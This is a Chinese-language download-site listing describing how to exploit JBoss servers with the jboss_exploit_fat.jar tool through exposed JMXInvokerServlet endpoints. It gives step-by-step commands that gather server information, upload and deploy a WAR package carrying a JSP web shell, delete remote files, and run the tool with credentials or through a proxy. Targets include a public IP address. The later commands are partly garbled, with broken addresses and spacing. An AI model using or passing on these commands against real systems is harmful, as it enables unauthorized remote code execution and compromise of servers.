
jboss漏洞利用方法。
5星
- 浏览量: 0
- 大小:None
- 文件类型:None
简介:
1. 可以查询服务器名称,Java程序通过执行 `java -jar jboss_exploit_fat.jar -i http://123.232.119.98:9009/invoker/JMXInvokerServlet` 获取,并检索 `jboss.system:type=ServerInfo` 操作系统信息。
2. 同样地,通过执行 `java -jar jboss_exploit_fat.jar -i http://192.168.7.84:10081/invoker/JMXInvokerServlet` 检索 `jboss.system:type=ServerInfo` 操作系统版本信息。
3. 利用 Java 程序,通过执行 `java -jar jboss_exploit_fat.jar -i http://192.168.7.84:10081/invoker/JMXInvokerServlet` 调用 `jboss.admin:service=DeploymentFileRepository` 服务,创建远程文件,指定名为 `myname.war` 的文件,并将其存储在当前目录下的 `.jsp` 文件中,内容为 shell 文件。
4. 进一步地,可以通过执行 `java -jar jboss_exploit_fat.jar -i http://192.168.7.84:10081/invoker/JMXInvokerServlet` 调用 `jboss.system:service=MainDeployer` 服务来部署该 war 包,从而获得一个 shell 地址。该 shell 地址位于 `http://192.168.7.84:10081/test/shell.jsp`。
5. 此外,还可以远程删除文件:使用 Java 程序执行 `java -jar jboss_exploit_fat.jar -i http://192.168.7.84:10081/invoker/JMXInvokerServlet` 调用 `jboss.admin:service=DeploymentFileRepository` 服务来移除文件和目录结构:删除 `D:\jboss\server\default\deploy\management\myname\.jsp` 文件。
6.支持提供用户名和密码进行验证的输入,并通过执行命令:`java -jar jboss_exploit_fat .jar -u name -p password -i http://192..
81 /invoker /JMXInvokerServlet invoke jboss .admin : service = DeploymentFileRepository remove myname index .jsp
7.还支持使用代理模式进行操作, 通过执行命令:java-jar jboss\_exploit\_fat .jar-P http://127.0.0.1:8080-i http://192.168.7.84:10081 /invoker /JMXInvokerServlet invoke jboss .admin : service = DeploymentFileRepository remove myname index .jsp 。
全部评论 (0)


